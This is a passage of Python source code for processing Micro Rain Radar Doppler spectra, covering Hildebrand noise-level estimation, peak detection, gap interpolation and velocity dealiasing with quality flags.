intSpectrum = deepcopy(self.rawSpectrum.data)
ix = np.arange(len(self.rawSpectrum.ravel()))
intSpectrum[self._specBorderMask3D] = np.interp(
ix[self._specBorderMask3D.ravel()],
ix[~self._specBorderMask3D.ravel()],
self.rawSpectrum[~self._specBorderMask3D]
)
self.rawSpectrum = np.ma.masked_array(
intSpectrum, self.rawSpectrum.mask)
self.qual["interpolatedSpectrum"] = np.ones(
self._shape2D, dtype=bool)
if self.debugStopper == 5:
return
else:
self.qual["interpolatedSpectrum"] = np.zeros(
self._shape2D, dtype=bool)
if self.co["fillInterpolatedPeakGaps"]:
(
self.rawSpectrum.mask,
self.qual["filledInterpolatedPeakGaps"]
) = self._fillInterpolatedPeakGaps(self.rawSpectrum.mask)
else:
self.qual["filledInterpolatedPeakGaps"] = np.zeros(
self._shape2D, dtype=bool)
# calculate the (not dealiased) SNR
self.SNR = (10*np.ma.log10(np.ma.sum(self.rawSpectrum, axis=-1) /
(self.specNoise*self.co["widthSpectrum"]))).filled(-9999)
if self.co["dealiaseSpectrum"] == True:
if self.co["dealiaseSpectrum_saveAlsoNonDealiased"] == True:
self.eta_noDA, self.Ze_noDA, self.W_noDA, self.etaNoiseAve_noDA_TBD, self.etaNoiseStd_noDA_TBD, self.specWidth_noDA, self.skewness_noDA, self.kurtosis_noDA, self.peakVelLeftBorder_noDA, self.peakVelRightBorder_noDA, self.leftSlope_noDA, self.rightSlope_noDA = self._calcEtaZeW(
self.rawSpectrum, self.H, self.specVel3D, self.specNoise, self.specNoise_std)
self.qual_noDA = deepcopy(self.qual)
# can be deleted, is identical to self.etaNoise, because noise is not dealiased.
del self.etaNoiseAve_noDA_TBD, self.etaNoiseStd_noDA_TBD
self.rawSpectrum = self._dealiaseSpectrum(self.rawSpectrum)
# since we don't want that spectrum from teh disturbed 1st range gate are folded into the secod on, peaks in the second one might be incomplete. try to make an entry in the quality mask.
self.qual["peakMightBeIncomplete"] = np.zeros(
self._shape2D, dtype=bool)
self.qual["peakMightBeIncomplete"][:, self.co["firstUsedHeight"]][self.rawSpectrum.mask[:, self.co["firstUsedHeight"],
self.co["widthSpectrum"]+self.co["spectrumBorderMin"][self.co["firstUsedHeight"]]] == False] = True
# no dealiasing
else:
pass
self.eta, self.Ze, self.W, self.etaNoiseAve, self.etaNoiseStd, self.specWidth, self.skewness, self.kurtosis, self.peakVelLeftBorder, self.peakVelRightBorder, self.leftSlope, self.rightSlope = self._calcEtaZeW(
self.rawSpectrum, self.H, self.specVel3D, self.specNoise, self.specNoise_std)
# make bin mask out of quality information
self.qualityBin, self.qualityDesc = self.getQualityBinArray(self.qual)
return
def _testMeanW(self, rawSpectrum):
'''
checks whether spectrum mean velocity is unequal to mean velocity (6m s^-1)
'''
mask = deepcopy(rawSpectrum.mask) + self._specBorderMask3D
spec = np.ma.masked_array(rawSpectrum.data, mask)
velocity = np.ma.masked_array(self.specVel3D, self._specBorderMask3D)
Wdiff = np.absolute(np.ma.average(
velocity, axis=-1)-(np.ma.sum(velocity*spec, axis=-1)/np.sum(spec, axis=-1)))
noiseMask = Wdiff.filled(0) < self.co["findPeak_minWdiff"]
return noiseMask, Wdiff.filled(0)
def _testStd(self, rawSpectrum):
'''
checks whether spectrum passes variance limit
'''
mask = deepcopy(rawSpectrum.mask) + self._specBorderMask3D
spec = np.ma.masked_array(rawSpectrum.data, mask)
std = (np.ma.std(spec, axis=-1)/np.ma.mean(spec, axis=-1))
# the 5.7 is because we have typically 5.7 spectra per second and this
# quantitiy was defined with self.co["averagingTime"] instead of
# self.noSpecPerTimestep before
maxStd = self.co["findPeak_minStdPerS"] / \
np.sqrt(self.noSpecPerTimestep/5.7)
return std.filled(0) < maxStd[:, np.newaxis], std.filled(0)
def _findAddtionalPeaks(self, rawSpectrum):
'''
This functio tries to find addtional peaks in the spectrum
disabled since it gives too many false positives...
'''
qual = np.zeros(self._shape2D, dtype=bool)
# invert mask
rawSpectrum = np.ma.masked_array(rawSpectrum.data, ~rawSpectrum.mask)
self.co["findAddtionalPeaksThreshold"] = 15
for tt in range(self.no_t):
for hh in range(self.no_h):
if hh in self.co["completelyMaskedHeights"]:
continue
greaterZero = 0
for ii in range(self.co["spectrumBorderMin"][hh], self.co["spectrumBorderMax"][hh]):
if greaterZero >= self.co["findAddtionalPeaksThreshold"]:
qual[tt, hh] = True
if rawSpectrum.mask[tt, hh, ii] == True or rawSpectrum.data[tt, hh, ii] <= 0:
greaterZero = 0
continue
else:
greaterZero += 1
return qual
def _cleanUpNoiseMask(self, spectrum):
"""
11 of 5x5 points in height/time space must have a signal to be valid!
@parameter spectrum (numpy masked float): spectrum + noiseMask to be applied to teh data
@return - newMask (numpy boolean):numpy boolean noiseMask
"""
noiseMask = np.all(spectrum.mask, axis=-1)
newMask = deepcopy(noiseMask)
# make it bigger to cover edges for 5x5 test, 2 pixel border
maxs = np.ma.masked_all((self.no_t+4, self.no_h+1))
maxs[2:-2, 2:-2] = np.ma.masked_array(
np.ma.argmax(spectrum, axis=-1), noiseMask)[:, 2:30]
highLimit = 11
lowLimit = 9
lowestLimit = 8
hOffset = self.co["minH"] # since we don't start at zero height
# loop through all points...
for t in np.arange(self.no_t):
# is it real signal? only if at least 11 of 25 neigbours have signal as well!
# for h in np.arange(4,28):
for h in np.arange(2, 30):
if noiseMask[t, h] == False:
tSM = t+2 # for subMaxs t needs to be 2 larger due to 2 pixel border! for h not neccesary, 2 pixel border at botztom already there
subMaxs = maxs[tSM-2:tSM+3, h-2:h+3]
thisMaxsDiff = 32-maxs[tSM, h]
subMaxsNormed = limitMaInidces(subMaxs + thisMaxsDiff, 64)
diffs = np.abs(subMaxsNormed - 32)
if t in [0, self.no_t-1] or h in [2, 29]:
limit = lowestLimit
elif t in [1, self.no_t-2] or h in [3, 28]:
limit = lowLimit
else:
limit = highLimit
if np.ma.sum(diffs <= self.co["confirmPeak_5x5boxCoherenceTest_maxBinDistane"]) < limit:
newMask[t, h] = True
# kick out heights #0,1,30
newMask[:, self.co["completelyMaskedHeights"]] = True
self.qual["spectrumNotProcessed"] = np.zeros(self._shape2D, dtype=bool)
self.qual["spectrumNotProcessed"][:,
self.co["completelyMaskedHeights"]] = True
return newMask
def _getPeak(self, spectrum, noSpecs, h):
"""
get the peak of the spectrum, first getPeakHildebrand is used, if the spectrum is wider than 10 and makeDoubleCheck = True, also getPeakDescendingAve is used and the smaller one is taken!
@parameter spectrum (numpy float64): (averaged, dealiased) raw data from MRR Raw data
@parameter noSpecs (numpy float64):number of single spectras which belong to each average spectrum, usually 58* No of averaged spectra
@paramter h, (int): height, for easier debugging
@return - spectrum (numpy float64): masked(!) spectrum
@return - qualiy (dict with array bool)
"""
t = time.time()
quality = dict()
specLength = np.shape(spectrum)[-1]
# get maxima of reduced spectra
iMax = np.argmax(spectrum, axis=-1)
iMaxFlat = np.ravel(iMax)
# arrays don't work, so make them flat
spectrumFlat = np.reshape(spectrum, (-1, specLength))
if self.co["getPeak_method"] == "hilde":
# get peak using Hildebrands method
firstPeakMask = self._getPeakHildebrand(
spectrumFlat, iMaxFlat, noSpecs, h)
elif self.co["getPeak_method"] == "descAve":
# get peak using Hildebrands method
firstPeakMask = self._getPeakDescendingAve(spectrumFlat, iMaxFlat)
else:
raise ValueError("Unknown doubleCheckPreference: " +
self.co["getPeak_method"])
peakMask = deepcopy(firstPeakMask)
# look for wide peak and make a second check
if self.co["getPeak_makeDoubleCheck"]:
doubleCheck = np.sum(np.logical_not(
firstPeakMask), axis=-1) > specLength * self.co["getPeak_makeDoubleCheck_minPeakWidth"]
quality["veryWidePeakeUsedSecondPeakAlgorithm"] = doubleCheck
if np.any(doubleCheck == True):
#secondPeakMVeryWidePeakeUask = getPeakDescendingAve(spectrumFlat,iMaxFlat)
secondPeakMask = np.zeros(np.shape(spectrumFlat), dtype=bool)
if self.co["getPeak_method"] == "hilde":
# get peak using desc Average method
secondPeakMask[doubleCheck] = self._getPeakDescendingAve(
spectrumFlat[doubleCheck], iMaxFlat[doubleCheck])
elif self.co["getPeak_method"] == "descAve":
# get peak using Hildebrands method
secondPeakMask[doubleCheck] = self._getPeakHildebrand(
spectrumFlat[doubleCheck], iMaxFlat[doubleCheck], noSpecs[doubleCheck], h)
peakMask[doubleCheck] = firstPeakMask[doubleCheck] + \
secondPeakMask[doubleCheck]
else:
quality["veryWidePeakeUsedSecondPeakAlgorithm"] = np.zeros(
specLength, dtype=bool)
# only peaks which are at least 3 bins wide, remove the others
tooThinn = np.sum(np.logical_not(peakMask), axis=-
1) < self.co["findPeak_minPeakWidth"]
peakMask[tooThinn] = True
quality["peakTooThinn"] = tooThinn * (np.sum(~peakMask, axis=-1) != 0)
if self.co["debug"] > 0:
print("runtime", time.time()-t, "s")
# spectrum
return np.reshape(peakMask, np.shape(spectrum)), quality["peakTooThinn"], quality["veryWidePeakeUsedSecondPeakAlgorithm"]
# get the border indices belonging to the hildebrand limit
def _getPeakHildebrand(self, dataFlat, iMax, noSpecs, h):
"""
get the peak of the spectrum using Hildebrand algorithm. Note that this routine works
'the other way around' than e.g. pamtra's or pyart's Hildebrand routine. I.e. we start
with the full spectrum and remove the largest bins instead of starting with the
smallest values and adding larger ones. This is more robust for the MRR. also
getPeak_hildeExtraLimit works better for MRR than teh traditional threshold definition from HS74.
@parameter dataFlat (numpy float64): flat spectrum from MRR Raw data
@parameter iMax (numpy float64): vector containing indices of the maxima
@parameter Nspec (numpy float64): number of spectra of each averaged spectrum
@return - iPeakMin, iMax (int float64): edges of each spectrum
"""
# first get the limit reflectivity
limits = self._noiseHildebrand(dataFlat, noSpecs, h)
maskHildebrand = np.ones(np.shape(dataFlat), dtype=bool)
iPeakMax = deepcopy(iMax)
iPeakMin = deepcopy(iMax)
# not only uses extra limit, but also starts at the peak!, thus specturm is refolded around peak!
# then get the edges of the peak as index of the spectrum
for k in np.arange(iMax.shape[0]):
# unmask the peak
maskHildebrand[k, iMax[k]] = False
spectrum = np.roll(dataFlat[k], -iMax[k])
mask = np.roll(maskHildebrand[k], -iMax[k])
# to the right
for i in np.arange(1, dataFlat.shape[-1], 1):
# unmask if above limit (=peak)
if spectrum[i] > limits[k]*self.co["getPeak_hildeExtraLimit"]:
mask[i] = False
# else stop
else:
# unmask on last bin if between limits[k]*self.co["getPeak_hildeExtraLimit"] and limits[k], but stop in any case!
if spectrum[i] > limits[k]:
mask[i] = False
break
# to the left
for i in np.arange(dataFlat.shape[-1]-1, 0-1, -1):
if spectrum[i] > limits[k]*self.co["getPeak_hildeExtraLimit"]:
mask[i] = False
else:
if spectrum[i] > limits[k]:
mask[i] = False
break
dataFlat[k] = np.roll(spectrum, iMax[k])
maskHildebrand[k] = np.roll(mask, iMax[k])
return maskHildebrand
def _noiseHildebrand(self, dataFlat, noSpecs, h, flat=True):
"""
#calculate the minimum reflectivity of the peak (or maximum of the noise) according to Hildebrand and Sekhon
@parameter dataFlat (numpy masked array float64): flat spectrum from MRR Raw data
@parameter Nspec (numpy float64): number of spectra of each averaged spectrum
@return - limits (int float64): limit reflectivity of each spectrum
"""
specLength = np.shape(dataFlat)[-1]
if flat == False:
dataShape = np.shape(dataFlat)[0]
dataFlat = np.reshape(dataFlat, (-1, specLength))
# sort the data
dataFlat = np.ma.sort(dataFlat, axis=-1)
# calculate all variances and means (that is cheaper than a loop!)
# start with whole spectrum, then discard maximum, than second but next maximum etc.
Dvar = np.zeros(dataFlat.shape)
Dmean = np.zeros(dataFlat.shape)
limits = np.zeros(np.shape(dataFlat[..., 0]))
for i in np.arange(specLength-1, 1, -1):
Dvar[..., i] = np.ma.var(dataFlat[..., 0:i], axis=-1)
Dmean[..., i] = np.ma.mean(dataFlat[..., 0:i], axis=-1)
# calculate the Hildebrand coefficient
Dvar[Dvar == 0] = 0.0001
Coefficient = ((Dmean**2) / Dvar)
# check where hildebrands assumption is true
for j in np.arange(np.shape(dataFlat)[0]):
for i in np.arange(specLength-1, -1, -1):
if Coefficient[j, i] >= noSpecs[j]:
limits[j] = dataFlat[j, i-1]
break
if flat == False:
limits = np.reshape(limits, (dataShape, self.co["noH"]))
return limits
def _getPeakDescendingAve(self, dataFlat, iMax):
"""
get the peak of the spectrum
function iterates through the _not_ size-sorted spectrum from the maximum to the left and to the right and stops as soon as the average stops decreasing.
@parameter dataFlat (numpy float64): flat spectrum from MRR Raw data
@parameter iMax (numpy float64): vector containing indices of the maxima
@return - iPeakMin, iMax (int float64): edges of each spectrum
"""
maskDescAve = np.ones(np.shape(dataFlat), dtype=bool)
# iterate through spectras:
for k in np.arange(iMax.shape[0]):
# the rolling allow recognition also if 0 m s^-1 is crossed
rolledSpectrum = np.roll(dataFlat[k], -iMax[k])
rolledMask = np.roll(maskDescAve[k], -iMax[k])
meanRightOld = np.ma.mean(
rolledSpectrum[1:self.co["getPeak_descAveCheckWidth"]+1])
meanLeftOld = np.ma.mean(
rolledSpectrum[-1:-(self.co["getPeak_descAveCheckWidth"]+1):-1])
minMeanToBreak = self.co["getPeak_descAveMinMeanWeight"] * np.mean(
np.sort(dataFlat[k])[0:self.co["getPeak_descAveCheckWidth"]])
# unmask peak
rolledMask[0] = False
# to the right:
for i in np.arange(1, dataFlat.shape[-1], 1):
meanRight = np.ma.mean(
rolledSpectrum[i:i+self.co["getPeak_descAveCheckWidth"]])
# is the average still decraesing?
if meanRight <= meanRightOld or meanRight > minMeanToBreak:
rolledMask[i] = False
meanRightOld = meanRight
else:
break
# to the left
for i in np.arange(dataFlat.shape[-1]-1, 0-1, -1):
meanLeft = np.ma.mean(
rolledSpectrum[i:i-self.co["getPeak_descAveCheckWidth"]:-1])
# is the average still decraesing?
if meanLeft <= meanLeftOld or meanLeft > minMeanToBreak:
rolledMask[i] = False
meanLeftOld = meanLeft
else:
break
dataFlat[k] = np.roll(rolledSpectrum, iMax[k])
maskDescAve[k] = np.roll(rolledMask, iMax[k])
return maskDescAve
def _fillInterpolatedPeakGaps(self, specMask):
'''
Interpolate gaps of specMask around 0 m s^-1 between spectrumBorderMin and spectrumBorderMax in noH heights
returns updated specMask and quality information
'''
quality = np.zeros(self._shape2D, dtype=bool)
for h in range(1, self.co["noH"]):
# the ones with peaks at both sides around 0 m s^-1!
peaksAroundZero = (specMask[:, h-1, self.co["spectrumBorderMax"][h-1]-1] == False) * (
specMask[:, h, self.co["spectrumBorderMin"][h]] == False)
specMask[:, h, 0:self.co["spectrumBorderMin"]
[h]][peaksAroundZero] = False
specMask[:, h-1, self.co["spectrumBorderMax"]
[h-1]:][peaksAroundZero] = False
# the ones with peak at only one side,
peaksAroundZeroHalfToLeft = (specMask[:, h-1, self.co["spectrumBorderMax"][h-1]-1] == True) * (
specMask[:, h, self.co["spectrumBorderMin"][h]] == False)
peaksAroundZeroHalfToLeftBMin = (peaksAroundZeroHalfToLeft * (
self.rawSpectrum.data[:, h, 0:self.co["spectrumBorderMin"][h]] > self.specNoise3D[:, h, 0:self.co["spectrumBorderMin"][h]]).T).T
peaksAroundZeroHalfToLeftBMax = (peaksAroundZeroHalfToLeft * (
self.rawSpectrum.data[:, h-1, self.co["spectrumBorderMax"][h-1]:] > self.specNoise3D[:, h, self.co["spectrumBorderMax"][h-1]:]).T).T
specMask[:, h, 0:self.co["spectrumBorderMin"]
[h]][peaksAroundZeroHalfToLeftBMin] = False
specMask[:, h-1, self.co["spectrumBorderMax"]
[h-1]:][peaksAroundZeroHalfToLeftBMax] = False
peaksAroundZeroHalfToRight = (specMask[:, h-1, self.co["spectrumBorderMax"][h-1]-1] == False) * (
specMask[:, h, self.co["spectrumBorderMin"][h]] == True)
peaksAroundZeroHalfToRightBMin = (peaksAroundZeroHalfToRight * (
self.rawSpectrum.data[:, h, 0:self.co["spectrumBorderMin"][h]] > self.specNoise3D[:, h-1, 0:self.co["spectrumBorderMin"][h]]).T).T
peaksAroundZeroHalfToRightBMax = (peaksAroundZeroHalfToRight * (
self.rawSpectrum.data[:, h-1, self.co["spectrumBorderMax"][h-1]:] > self.specNoise3D[:, h-1, self.co["spectrumBorderMax"][h-1]:]).T).T
specMask[:, h, 0:self.co["spectrumBorderMin"]
[h]][peaksAroundZeroHalfToRightBMin] = False
specMask[:, h-1, self.co["spectrumBorderMax"][h-1] :][peaksAroundZeroHalfToRightBMax] = False
quality[:, h] = quality[:, h-1] = peaksAroundZero + \
peaksAroundZeroHalfToLeft + peaksAroundZeroHalfToRight
return specMask, quality
def _dealiaseSpectrum(self, rawSpectrum):
'''
dealiase Spectrum
input rawSpectrum
output extendSpectrum with 192 bins
'''
self.qual["severeProblemsDuringDA"] = np.zeros(
self._shape2D, dtype=bool)
# first locate peaks in raveld specturm
self._allPeaks, self._allPeaksIndices, self._allPeaksMaxIndices, self._allPeaksVelMe, self._allPeaksHeight, self._allPeaksRefV, self._allPeaksZe = self._locatePeaks(
rawSpectrum)
# find one peaks and its veloci/heigth you trust
self._trustedPeakNo, self._trustedPeakHeight, self._trustedPeakVel, self._trustedPeakHeightStart, self._trustedPeakHeightStop = self._getTrustedPeak(
self._allPeaksZe, self._allPeaksVelMe, self._allPeaksRefV, self._allPeaksMaxIndices, self._allPeaksHeight)
# now extend spectrum!
extendedRawSpectrum = deepcopy(rawSpectrum.data)
extendedRawSpectrum = np.concatenate((np.roll(
extendedRawSpectrum, 1, axis=1), extendedRawSpectrum, np.roll(extendedRawSpectrum, -1, axis=1)), axis=2)
# do not apply fo first range gates
extendedRawSpectrum[:, 0, :self.co["widthSpectrum"]] = 0
# and not to the last one
extendedRawSpectrum[:, self.co["noH"] -
1, 2*self.co["widthSpectrum"]:] = 0
extendedRawSpectrum = np.ma.masked_array(extendedRawSpectrum, True)
# if wanted, save old values
if self.co["dealiaseSpectrum_saveAlsoNonDealiased"] == True:
self.specVel_noDA = deepcopy(self.specVel)
self.specVel3D_noDA = deepcopy(self.specVel3D)
self.specIndex_noDA = deepcopy(self.specIndex)
self.no_v_noDA = deepcopy(self.no_v)
# save new velocities
self.specVel = np.array(list(self.co["nyqVel"] - self.co["widthSpectrum"]*self.co["nyqVdelta"])+list(
self.co["nyqVel"])+list(self.co["nyqVel"] + self.co["widthSpectrum"]*self.co["nyqVdelta"]))
self.specVel3D = np.zeros(np.shape(extendedRawSpectrum))
self.specVel3D[:] = self.specVel
self.specIndex = np.arange(3*self.no_v)
self.no_v = self.no_v * 3
# extend spectrum to 192 bins and unmask best fitting peaks
extendedRawSpectrum = self._findHeightsForPeaks(extendedRawSpectrum, self._trustedPeakNo, self._trustedPeakVel, self._trustedPeakHeight,
self._trustedPeakHeightStart, self._trustedPeakHeightStop, self._allPeaks, self._allPeaksIndices, self._allPeaksVelMe, self._allPeaksHeight)
if self.co["dealiaseSpectrum_makeCoherenceTest"]:
# simple method to detect falsely folded peaks, works only for 1-2 outliers
extendedRawSpectrum = self._deAlCoherence(extendedRawSpectrum)
self.qual["spectrumIsDealiased"] = np.all(
extendedRawSpectrum.mask[:, :, self.co["widthSpectrum"]:2*self.co["widthSpectrum"]] != rawSpectrum.mask[:, :], axis=-1)
# still we don't want peaks at height 0,1,31
extendedRawSpectrum.mask[:, self.co["completelyMaskedHeights"]] = True
return extendedRawSpectrum
def _locatePeaks(self, rawSpectrum):
'''
ravel rawSpectrum and try to find one peak per height
returns time dictonaries with:
allPeaks - time dictonary with lists of the spectral reflectivities for each peak
allPeaksIndices - related indices
allPeaksMaxIndices - time dictonary maximum of each peak
allPeaksVelMe - first guess peak velocity based on the last bin
allPeaksHeight - first guess peak height based on the last bin
allPeaksRefV - expected velocity of each peak based on Ze according to theory
allPeaksZe - time dictonary with lists of first guess Ze for each peak
'''
allPeaks = dict()
allPeaksIndices = dict()
allPeaksMaxIndices = dict()
allPeaksVelMe = dict()
allPeaksHeight = dict()
allPeaksRefV = dict()
allPeaksZe = dict()
# get velocities of spectrum. we start negative, because first guess height is always defualt height of most right bin of peak
velMe = np.array(list(
self.co["nyqVel"] - self.co["widthSpectrum"]*self.co["nyqVdelta"])+list(self.co["nyqVel"]))
for t in np.arange(self.no_t):
completeSpectrum = self.rawSpectrum[t].ravel()
# skip if there are no peaks in the timestep
if np.all(completeSpectrum.mask) == True:
if self.co["debug"] > 4:
'_locatePeaks: nothing to do at', t
continue
deltaH = self.H[t, 15] - self.H[t, 14]
peaks = list()
peaksIndices = list()
peaksMaxIndices = list()
peaksVelMe = list()
peaksHeight = list()
peaksVref = list()
peaksZe = list()
peakTmp = list()
peakTmpInd = list()
peaksStartIndices = list()
peaksEndIndices = list()
truncatingPeak = False
# go through all bins
for ii, spec in enumerate(completeSpectrum):
# found peak!
withinPeak = (completeSpectrum.mask[ii] == False) and (
truncatingPeak == False)
if withinPeak:
peakTmp.append(spec)
peakTmpInd.append(ii)
# if the peak length is now larger than the raw spectrum width, then this peak has
# wrapped around the entire width. Flag will cause the peak to be split in two, because
# the next step within the loop through completeSpectrum will have withinPeak False.
if len(peakTmp) >= self.co["widthSpectrum"]:
truncatingPeak = True
warnings.warn('Truncated peak early. Masked area has wrapped around spectrum width at ' +
'timestemp ' + str(t) + ', bin number ' + str(ii))
# 3found no peak, but teh last one has to be processed
elif len(peakTmp) >= self.co["findPeak_minPeakWidth"]:
# get the height of the LAST entry of the peak, uses int division // !
peakTmpHeight = peakTmpInd[-1]//self.co["widthSpectrum"]
# reconstruct the non folded indices shifted by 64! since peakTmpInd[-1] is reference
orgIndex = np.arange(peakTmpInd[-1] % self.co["widthSpectrum"]-len(
peakTmpInd), peakTmpInd[-1] % self.co["widthSpectrum"])+1+self.co["widthSpectrum"]
# calculate a first guess Ze
etaSumTmp = np.sum(
peakTmp * np.array((self.co["mrrCalibConst"] * (peakTmpHeight**2 * deltaH)) / (1e20), dtype=float))
# in rare cases, Ze is below Zero, maybey since the wrong peak is examined?
if etaSumTmp <= 0:
warnings.warn('negative (linear) Ze occured during dealiasing, peak removed at timestep '+str(
t)+', bin number ' + str(ii)+', most likely at height ' + str(peakTmpHeight))
self.qual["severeProblemsDuringDA"][t,
peakTmpHeight] = True
peakTmp = list()
peakTmpInd = list()
continue
ZeTmp = 1e18*(self.co["lamb"]**4 *
etaSumTmp/(np.pi**5*self.co["K2"]))
# guess doppler velocity
peakTmpSnowVel = self.co['dealiaseSpectrum_Ze-vRelationSnowA'] * \
ZeTmp**self.co['dealiaseSpectrum_Ze-vRelationSnowB']
peakTmpRainVel = self.co['dealiaseSpectrum_Ze-vRelationRainA'] * \
ZeTmp**self.co['dealiaseSpectrum_Ze-vRelationRainB']
peakTmpRefVel = (peakTmpSnowVel + peakTmpRainVel)/2.
# save other features
peaksVref.append(peakTmpRefVel)
peaks.append(peakTmp)
peaksIndices.append(peakTmpInd)
peaksStartIndices.append(peakTmpInd[0])
peaksEndIndices.append(peakTmpInd[-1])
peaksMaxIndices.append(np.argmax(peakTmp)+ii-len(peakTmp))
peaksHeight.append(peakTmpHeight)
peaksVelMe.append(
np.sum((velMe[orgIndex[0]:orgIndex[-1]+1]*peakTmp))/np.sum(peakTmp))
peaksZe.append(ZeTmp)
peakTmp = list()
peakTmpInd = list()
truncatingPeak = False
# small peaks can show up again due to dealiasing, get rid of them:
elif len(peakTmp) > 0 and len(peakTmp) < self.co["findPeak_minPeakWidth"]:
peakTmp = list()
peakTmpInd = list()
truncatingPeak = False
# no peak
else:
continue
# we want only ONE peak per range gate!
if self.co["dealiaseSpectrum_maxOnePeakPerHeight"]:
# get list with peaks, whcih are too much
peaksTbd = self._maxOnePeakPerHeight(
t, peaksStartIndices, peaksEndIndices, peaksZe)
# remove them
for peakTbd in np.sort(peaksTbd)[::-1]:
peaks.pop(peakTbd)
peaksIndices.pop(peakTbd)
peaksMaxIndices.pop(peakTbd)
peaksVelMe.pop(peakTbd)
peaksHeight.pop(peakTbd)
peaksVref.pop(peakTbd)
peaksZe.pop(peakTbd)
# if anything was found, save it
if len(peaks) > 0:
allPeaks[t] = peaks
allPeaksIndices[t] = peaksIndices
allPeaksMaxIndices[t] = peaksMaxIndices
allPeaksVelMe[t] = peaksVelMe
allPeaksHeight[t] = peaksHeight
allPeaksRefV[t] = peaksVref
allPeaksZe[t] = peaksZe
# end for t
return allPeaks, allPeaksIndices, allPeaksMaxIndices, allPeaksVelMe, allPeaksHeight, allPeaksRefV, allPeaksZe
def _maxOnePeakPerHeight(self, t, peaksStartIndices, peaksEndIndices, peaksZe):
'''
some height will contain more than one peak, try to find them
returns a list with peaks to be delteted
'''
peaksStartIndices = np.array(peaksStartIndices)
peaksEndIndices = np.array(peaksEndIndices)
peaksZeCopy = np.array(peaksZe)
peaksTbd = list()
for pp, peakStart in enumerate(peaksStartIndices):
deletePeaks = False
if peakStart == -9999:
continue # peak has been deleted
followingPeaks = (peaksStartIndices >= peakStart) * \
(peaksStartIndices < peakStart+(1.5*self.co["widthSpectrum"]))
if (np.sum(followingPeaks) >= 3):
# if you have three peaks so close together it is cristal clear:
deletePeaks = True
elif (np.sum(followingPeaks) == 2):
# if you have only two they must be close together
secondPeak = np.where(followingPeaks)[0][1]
deletePeaks = (
peaksEndIndices[secondPeak] - peakStart < self.co["widthSpectrum"]/2.)
if deletePeaks == True:
# don't consider more than 3! the rest is hopefully caught by next loop!
Indices = np.where(followingPeaks)[0][0:3]
smallestZe = Indices[np.argmin(peaksZeCopy[Indices])]
peaksTbd.append(smallestZe)
# these are needed for the loop, so they are only masked, not deleted
peaksStartIndices[peaksTbd[-1]] = -9999
peaksEndIndices[peaksTbd[-1]] = -9999
peaksZeCopy[peaksTbd[-1]] = 9999
return peaksTbd
def _getTrustedPeak(self, allPeaksZe, allPeaksVelMe, allPeaksRefV, allPeaksMaxIndices, allPeaksHeight):
'''
find heigth and position of most trustfull peak
allPeaksZe - time dictonary with lists of first guess Ze for each peak
allPeaksVelMe - first guess peak velocity based on the last bin
allPeaksRefV - expected velocity of each peak based on Ze according to theory
allPeaksMaxIndices - time dictonary maximum of each peak
allPeaksHeight - first guess peak height based on the last bin
returns 1D time arrays
trustedPeakNo - no of trusted peaks (starting at bottom)
trustedPeakHeight - estimated height
trustedPeakVel - -estimated velocity
trustedPeakHeightStart, trustedPeakHeightStop - start and stop indices from 0:192 range
'''
trustedPeakHeight = np.zeros(self.no_t, dtype=int)
trustedPeakVel = np.zeros(self.no_t)
trustedPeakNo = np.ones(self.no_t, dtype=int)*-9999
trustedPeakHeightStart = np.zeros(self.no_t, dtype=int)
trustedPeakHeightStop = np.zeros(self.no_t, dtype=int)
for t in np.arange(self.no_t):
# now process the found peaks
if t in list(self._allPeaks.keys()):
# the trusted peak needs a certain minimal reflectivity to avoid confusion by interference etc, get the minimum threshold
averageZe = np.sum(allPeaksZe[t])/float(len(allPeaksZe[t]))
minZe = quantile(
self._allPeaksZe[t], self.co['dealiaseSpectrum_trustedPeakminZeQuantile'])
peaksVelMe = np.array(allPeaksVelMe[t])
peaksVels = np.array([peaksVelMe+self.co["nyqVdelta"]*self.co["widthSpectrum"],
peaksVelMe, peaksVelMe-self.co["nyqVdelta"]*self.co["widthSpectrum"]])
refVels = np.array(
[allPeaksRefV[t], allPeaksRefV[t], allPeaksRefV[t]])
# this difference between real velocity (thee different ones are tried: dealaisisnmg up, static or down) and expected Ze based velocityhas to be minimum to find trusted peak
diffs = np.abs(peaksVels - refVels)
# mask small peaks, peaks which are in the firt processed range gate and peaks which are in self.co["dealiaseSpectrum_heightsWithInterference"] (e.g. disturbed by interference)
diffs = np.ma.masked_array(diffs, [allPeaksZe[t] <= minZe]*3)
tripplePeaksMaxIndices = np.array(3*[allPeaksMaxIndices[t]])
# the first used height is a bit special, often peaks are incomplete,try to catch them to avoid trust them
diffs = np.ma.masked_array(diffs, (tripplePeaksMaxIndices >= self.co["firstUsedHeight"]*self.co["widthSpectrum"])*(
tripplePeaksMaxIndices < self.co["firstUsedHeight"]*(self.co["widthSpectrum"]*1.5)))
# now mask all other peaks which are found unlikely
for hh in self.co["dealiaseSpectrum_heightsWithInterference"]+self.co["completelyMaskedHeights"]:
diffs = np.ma.masked_array(diffs, (tripplePeaksMaxIndices >= hh*self.co["widthSpectrum"])*(
tripplePeaksMaxIndices < (hh+1)*self.co["widthSpectrum"]))
# if we managed to mask all peaks, we have no choice but taking all
if np.all(diffs.mask == True):
diffs.mask[:] = False
if self.co["debug"] > 4:
print("managed to mask all peaks at " + str(t) +
" while trying to find most trustfull one during dealiasing.")
# the minimum velocity difference tells wehther dealiasing goes up, down or is not applied
UpOrDn = np.ma.argmin(np.ma.min(diffs, axis=1))
# get paramters for trusted peaks
trustedPeakNo[t] = np.ma.argmin(diffs[UpOrDn])
# -1 to ensure that updraft is negative now!!
trustedPeakHeight[t] = allPeaksHeight[t][trustedPeakNo[t]] + UpOrDn-1
trustedPeakSpecShift = trustedPeakHeight[t] * \
self.co["widthSpectrum"] - self.co["widthSpectrum"]
trustedPeakVel[t] = peaksVels[UpOrDn][trustedPeakNo[t]]
# transform back to height related spectrum
# in dimension of 0:192 #spectrum is extended to the left
trustedPeakHeightIndices = (np.array(
self._allPeaksIndices[t][trustedPeakNo[t]])-trustedPeakSpecShift)[[0, -1]]
trustedPeakHeightStart[t] = trustedPeakHeightIndices[0]
trustedPeakHeightStop[t] = trustedPeakHeightIndices[-1]
return trustedPeakNo, trustedPeakHeight, trustedPeakVel, trustedPeakHeightStart, trustedPeakHeightStop
def _findHeightsForPeaks(self, extendedRawSpectrum, trustedPeakNo, trustedPeakVel, trustedPeakHeight, trustedPeakHeightStart, trustedPeakHeightStop, allPeaks, allPeaksIndices, allPeaksVelMe, allPeaksHeight):
'''
try to find the height of each peak by starting at the trusted peak
extendedRawSpectrum - extended to 192 bins, returned with new, dealiased mask
trustedPeakNo - trusted peak number of all peaks in time step
trustedPeakVel - most liekely velocity
trustedPeakHeight - most likely height
